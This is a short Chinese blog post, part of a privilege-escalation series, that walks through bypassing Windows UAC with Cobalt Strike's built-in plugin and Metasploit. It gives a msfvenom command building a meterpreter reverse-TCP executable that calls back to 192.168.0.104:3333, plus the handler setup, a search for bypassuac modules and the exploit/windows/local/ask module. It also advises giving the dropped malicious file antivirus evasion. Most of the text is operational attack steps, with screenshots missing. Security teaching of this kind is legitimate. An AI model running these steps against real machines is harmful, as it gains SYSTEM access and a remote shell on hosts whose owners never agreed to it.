操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

系列文章

操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

MSF和CS绕过UAC提权

CS绕过UAC提权

拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC

在这里插入图片描述

执行添加用户的命令时显示拒绝访问

在这里插入图片描述
使用CS自带的插件进行绕过提权

在这里插入图片描述
直接提到了system权限

在这里插入图片描述
在这里插入图片描述

提权后可以完成添加用户的命令

在这里插入图片描述

MSF绕过UAC

bypassuac模块

使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置

生成一个MSF的SHELL

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -f exe -o test.exe 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 3333
exploit

在这里插入图片描述

getuid

在这里插入图片描述

试一下getsystem发现失败

在这里插入图片描述

msf搜索 bypassuac 得到很多模块

search bypassuac

在这里插入图片描述

使用一个模块试一试

在这里插入图片描述

RUNAS模块绕过UAC

该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell

这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可

use exploit/windows/local/ask

在这里插入图片描述

用户点击后直接获取高权限

在这里插入图片描述

posted @ 2023-02-25 17:32  私ははいしゃ敗者です  阅读(60)  评论(0编辑  收藏  举报  来源